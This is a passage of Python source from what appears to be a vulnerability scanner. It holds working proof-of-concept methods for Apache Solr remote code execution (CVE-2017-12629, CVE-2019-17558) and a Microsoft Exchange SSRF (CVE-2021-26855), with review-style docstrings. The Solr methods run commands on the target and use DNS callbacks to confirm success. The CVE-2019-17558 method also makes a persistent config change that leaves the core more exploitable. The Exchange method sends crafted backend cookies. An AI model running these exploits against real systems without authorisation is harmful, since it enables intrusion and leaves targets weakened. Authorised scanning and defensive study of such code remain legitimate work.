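     by every HTTP connection in this process - to ``HTTP/1.0`` and never
     restores it.  It is kept as-is because other PoCs may rely on it, but it
     means every later request from any scanner thread goes out as HTTP/1.0.

     Changes from the previous revision: the core-listing parse catches
     ``Exception`` instead of a bare ``except`` (which also ate
     ``KeyboardInterrupt``), the unused ``payload2`` / ``headers_solr2``
     locals are gone, and the thread lock is released in ``finally``.
     """
     self.threadLock.acquire()
     try:
         http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'
         self.vul_info.update({
             "prt_name": "Apache Solr: CVE-2017-12629",
             "prt_resu": "null",
             "prt_info": "null",
             "vul_payd": self.payload_cve_2017_12629.replace("RECOMMAND", "whoami"),
             "vul_urls": self.url,
             "vul_name": "Apache Solr 远程代码执行漏洞",
             "vul_numb": "CVE-2017-12629",
             "vul_apps": "Solr",
             "vul_date": "2017-10-14",
             "vul_vers": "< 7.1.0",
             "vul_risk": "high",
             "vul_type": "Remote Code Execution",
             "vul_data": "null",
             "vul_desc": ("Apache Solr 是Apache开发的一个开源的基于Lucene的全文搜索服务器。其集合的配置方法"
                          "(config路径)可以增加和修改监听器,通过RunExecutableListener执行任意系统命令。"),
             "cre_auth": "zhzyker",
         })
         # "null" placeholder so the str() in the URL below never sees None.
         core_name = "null"
         new_core = random_md5()
         md = dns_request()
         cmd = "ping " + md
         payload1 = self.payload_cve_2017_12629.replace(
             "RECOMMAND", cmd).replace("new_core", new_core)
         url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
         headers_solr1 = {
             'Accept': "*/*",
             'User-Agent': self.ua,
             'Content-Type': "application/json"
         }
         try:
             request = requests.get(url_core,
                                    headers=headers_solr1,
                                    timeout=self.timeout,
                                    verify=False)
             try:
                 # First key of the "status" object is the first core name.
                 core_name = list(json.loads(request.text)["status"])[0]
             except Exception:
                 # Listing unreadable (non-JSON, no "status", empty): keep the
                 # placeholder so the config POST still goes out and the DNS
                 # check can still run.
                 pass
             req = requests.post(self.url + "/solr/" + str(core_name) +
                                 "/config",
                                 data=payload1,
                                 headers=headers_solr1,
                                 timeout=self.timeout,
                                 verify=False)
             if dns_result(md):
                 self.vul_info["vul_data"] = dump.dump_all(req).decode(
                     'utf-8', 'ignore')
                 self.vul_info["prt_resu"] = "PoCSuCCeSS"
                 self.vul_info["prt_info"] = "[dns] [newcore: " + new_core + "] "
             elif request.status_code == 200 and core_name != "null" and core_name is not None:
                 # Weak signal: a reachable cores listing with a real core name,
                 # independent of how the config POST was answered.
                 self.vul_info["vul_data"] = dump.dump_all(req).decode(
                     'utf-8', 'ignore')
                 self.vul_info["prt_resu"] = "PoC_MaYbE"
                 self.vul_info["prt_info"] = "[maybe] [newcore: " + new_core + "] "
             verify.scan_print(self.vul_info)
         except requests.exceptions.Timeout:
             verify.timeout_print(self.vul_info["prt_name"])
         except requests.exceptions.ConnectionError:
             verify.connection_print(self.vul_info["prt_name"])
         except Exception:
             verify.error_print(self.vul_info["prt_name"])
     finally:
         self.threadLock.release()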
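 def cve_2019_17558_poc(self) -> None:
     """Check Apache Solr (5.0.0 - 8.3.1) for CVE-2019-17558, Velocity template RCE.

     Enumerates cores through ``/solr/admin/cores``, enables the
     ``VelocityResponseWriter`` with ``params.resource.loader.enabled`` on the
     first core via the config API, then issues ``self.payload_cve_2019_17558``
     with ``RECOMMAND`` -> ``ping <dnslog-domain>``.  A DNS callback gives
     ``PoCSuCCeSS``; otherwise merely having found a core name gives
     ``PoC_MaYbE``, which is a very loose signal (it says nothing about how the
     config POST was answered).  Results go to ``self.vul_info`` / ``verify``;
     nothing is returned.

     Operational caveats: the config POST is a persistent change to the
     target's Solr core that the scanner does not revert and that leaves the
     core *more* exploitable than before; the template really runs a command.
     ``vul_date`` reads 2017-10-16 for a 2019 CVE - left untouched here, but
     worth checking against the advisory.

     Changes from the previous revision: the success path used to concatenate
     ``core_name`` directly, raising ``TypeError`` (reported as a generic
     error) when the cores listing had failed and it was still ``None``; the
     redundant ``prt_resu != "PoCSuCCeSS"`` test is gone; the listing parse
     catches ``Exception`` rather than a bare ``except``; the thread lock is
     released in ``finally``.
     """
     self.threadLock.acquire()
     try:
         self.vul_info.update({
             "prt_name": "Apache Solr: CVE-2019-17558",
             "prt_resu": "null",
             "prt_info": "null",
             "vul_urls": self.url,
             "vul_payd": self.payload_cve_2019_17558.replace("RECOMMAND", "whoami"),
             "vul_name": "Apache Solr Velocity template Remote Code Execution",
             "vul_numb": "CVE-2019-17558",
             "vul_apps": "Solr",
             "vul_date": "2017-10-16",
             "vul_vers": "5.0.0 - 8.3.1",
             "vul_risk": "high",
             "vul_type": "Remote Code Execution",
             "vul_data": "null",
             "vul_desc": "用户可以注入自定义模板,通过Velocity模板语言执行任意命令。",
             "cre_auth": "zhzyker",
         })
         core_name = None
         md = dns_request()
         cmd = "ping " + md
         payload_2 = self.payload_cve_2019_17558.replace("RECOMMAND", cmd)
         url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
         try:
             request = requests.get(url_core,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
             try:
                 # First key of the "status" object is the first core name.
                 core_name = list(json.loads(request.text)["status"])[0]
             except Exception:
                 # Listing unreadable: proceed with "None" in the path so the
                 # remaining requests still go out and dnslog is still checked.
                 pass
             core_url = self.url + "/solr/" + str(core_name)
             url_api = core_url + "/config"
             headers_json = {
                 'Content-Type': 'application/json',
                 'User-Agent': self.ua
             }
             # Turns on the Velocity writer with parameter-supplied templates -
             # the precondition the payload below relies on.
             set_api_data = """
         {
           "update-queryresponsewriter": {
             "startup": "lazy",
             "name": "velocity",
             "class": "solr.VelocityResponseWriter",
             "template.base.dir": "",
             "solr.resource.loader.enabled": "true",
             "params.resource.loader.enabled": "true"
           }
         }
         """
             try:
                 r = requests.post(url_api,
                                   data=set_api_data,
                                   headers=headers_json,
                                   timeout=self.timeout,
                                   verify=False)
                 req = requests.get(core_url + payload_2,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
                 req = dump.dump_all(req).decode('utf-8', 'ignore')
                 r = dump.dump_all(r).decode('utf-8', 'ignore')
             except Exception:
                 # Either request failed; keep placeholders so the report is
                 # still emitted and the DNS check still runs.
                 req = "timeout"
                 r = "timeout"
             if dns_result(md):
                 self.vul_info["vul_data"] = req
                 self.vul_info["prt_resu"] = "PoCSuCCeSS"
                 self.vul_info["prt_info"] = "[dns] [corename: " + core_url + " ]"
             elif core_name is not None:
                 self.vul_info["vul_data"] = r
                 self.vul_info["prt_resu"] = "PoC_MaYbE"
                 self.vul_info["prt_info"] = "[maybe] [corename: " + core_url + " ]"
             verify.scan_print(self.vul_info)
         except requests.exceptions.Timeout:
             verify.timeout_print(self.vul_info["prt_name"])
         except requests.exceptions.ConnectionError:
             verify.connection_print(self.vul_info["prt_name"])
         except Exception:
             verify.error_print(self.vul_info["prt_name"])
     finally:
         self.threadLock.release()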
 def cve_2021_26855_poc(self) -> None:
     """Probe a host for the Exchange SSRF tracked as CVE-2021-26855 and report the outcome.

     The method fills ``self.vul_info`` with the finding metadata, issues one GET
     against ``/owa/auth/x.js`` with an ``X-BEResource`` cookie pointing at a
     DNS-callback host, and treats a callback seen by ``dns_result`` as a
     confirmed result (``"PoCSuCCeSS"``). When no callback is observed it falls
     back to a ``localhost``-targeted cookie and looks for a specific HTTP 500
     error body, which is only reported as ``"PoC_MaYbE"``. Results are handed to
     ``verify.scan_print``; timeouts, connection errors and any other
     ``Exception`` are routed to the matching ``verify.*_print`` helper instead.

     Side effects: holds ``self.threadLock`` for the whole run, mutates
     ``self.vul_info`` in place, and performs outbound HTTP requests with TLS
     certificate verification disabled (``verify=False``).

     Returns:
         None. The outcome is communicated only through ``self.vul_info`` and the
         ``verify`` print helpers.
     """
     # NOTE(review): the lock is released at the bottom of the method, not in a
     # ``finally``. Every ``Exception`` is caught below, but a ``BaseException``
     # such as KeyboardInterrupt would leave the lock held.
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Microsoft Exchange: CVE-2021-26855"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "null"
     self.vul_info["vul_name"] = "Microsoft Exchange Server SSRF"
     self.vul_info["vul_numb"] = "CVE-2021-26855"
     self.vul_info["vul_apps"] = "Exchange"
     self.vul_info["vul_date"] = "2021-03-03"
     self.vul_info["vul_vers"] = "Exchange Server 2010 2013 2016 2019"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "SSRF"
     self.vul_info["vul_data"] = "null"
     # Runtime string (report text), left as written by the author.
     self.vul_info[
         "vul_desc"] = "Exchange 中身份验证后的任意文件写入漏洞。攻击者可以通过 Exchange 服务器进行身份验证,同时可以利用漏洞将文件写入服务器上的任何路径。也可以通过利用 CVE-2021-26855 SSRF 漏洞或通过破坏合法管理员的凭据来进行身份验证。"
     self.vul_info["cre_date"] = "2021-03-07"
     self.vul_info["cre_auth"] = "zhzyker"
     url = self.url + "/owa/auth/x.js"
     # dns_request() is an external helper; presumably it returns a unique
     # DNS-callback hostname that dns_result() can later be queried for — confirm
     # against its definition.
     dns = dns_request()
     # Two cookie variants: the first keeps the backend target as ``localhost``
     # (used for the signature-based fallback), the second substitutes the
     # callback host so a DNS lookup by the server becomes observable.
     cookie_local = "X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;"
     cookie_dns = "X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;".replace(
         "localhost", dns)
     try:
         headers = {
             "User-agent": self.ua,
             "Cookie": cookie_dns,
             "Connection": "close"
         }
         # First request: DNS-callback variant. TLS verification is disabled.
         res = requests.get(url,
                            headers=headers,
                            timeout=self.timeout,
                            verify=False)
         if dns_result(dns):
             # An observed callback is the strong signal; record the full
             # request/response dump and the cookie that was sent.
             self.vul_info["vul_data"] = dump.dump_all(res).decode(
                 'utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info["vul_payd"] = headers["Cookie"]
             self.vul_info["prt_info"] = "[ssrf] [dns] [cookie: " + headers[
                 "Cookie"] + "]"
         else:
             # Fallback: no callback seen, so retry with the localhost cookie and
             # rely on an error-body signature alone. This is weaker evidence,
             # hence the "PoC_MaYbE" verdict.
             headers = {
                 "User-agent": self.ua,
                 "Cookie": cookie_local,
                 "Connection": "close"
             }
             res = requests.get(url,
                                headers=headers,
                                timeout=self.timeout,
                                verify=False)
             if res.status_code == 500 and "NegotiateSecurityContext failed with for host" in res.text:
                 if r"TargetUnknown" in res.text and r"localhost" in res.text:
                     self.vul_info["vul_data"] = dump.dump_all(res).decode(
                         'utf-8', 'ignore')
                     self.vul_info["prt_resu"] = "PoC_MaYbE"
                     self.vul_info["vul_payd"] = headers["Cookie"]
                     self.vul_info[
                         "prt_info"] = "[ssrf] [maybe] [cookie: " + headers[
                             "Cookie"] + "]"
         # Printed unconditionally; prt_resu stays "null" when neither check hit.
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as error:
         # ``error`` is bound but never reported; the generic printer only
         # receives the probe name, so the underlying cause is lost here.
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()